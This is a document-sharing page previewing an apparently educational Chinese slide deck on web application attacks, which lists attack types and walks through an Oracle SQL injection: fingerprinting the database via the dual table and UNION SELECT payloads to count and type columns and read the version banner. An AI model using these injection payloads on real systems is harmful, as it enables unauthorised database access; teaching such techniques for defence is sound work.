- 5
- 0
- 约1.81千字
- 约 69页
- 2017-04-27 发布于四川
- 举报
web应用攻击的技术
目录;SQL注入(SQL injection)
跨站脚本攻击
恶意代码
已知弱点和错误配置
隐藏字段
后门和调试漏洞
参数篡改
更改cookie
输入信息控制
缓冲区溢出;SQL注入;;;;SQL注入攻击过程演示(1);判断数据库类型
根据入侵经验该系统的后台可能为ORACLE数据库
Dual这个表是ORACLE数据库特有的, 看下它是否存在,如果存在就说明数据库为ORACLE。
提交:And 0(select count(*) from dual),返回正常页面
;字段猜解
猜解字段数量并构造查询语句
And%201=1%20union%20select%20null,null,null,null,null,null,null,null,null,null from dual—页面返回正常,查询语句语法正确
检测字段类型and%201=1%20union%20select%20null,null,‘null’,’null’,null,null,‘null’,’null’,‘null’,’null’%20from%20dual—在第3 ,4,7,8,9,10位置加上 单引号均返回正常页面,字段是字符型;查询ORACLE数据库的版本
and%20%201=2%20union%20select%20null,null,(select%20banner%20from%20sys.v_$v
您可能关注的文档
最近下载
- 矩阵分析在通信领域的应用论文.docx VIP
- AAC板材施工方案.docx VIP
- JTT1495-2024公路水运危险性较大工程安全专项施工方案审查规程.pdf VIP
- 地方建筑图集 甘肃甘12G2填充墙与柱、剪力墙及梁板构造.docx VIP
- 2025年6月浙江省普通高校招生选考科目考试化学试题与答案.docx VIP
- 郑州市2026届高三(二模)化学试卷(含答案).pdf
- 智能机器人技术--巡检机器人.pptx VIP
- 大学本科《社会主义发展史》课程期末考试试题库完整版2024.docx VIP
- 2020年印尼劳工法-(中文版).pdf VIP
- 丙烯酸乙酯-国际化学品安全卡.pdf VIP
原创力文档

文档评论(0)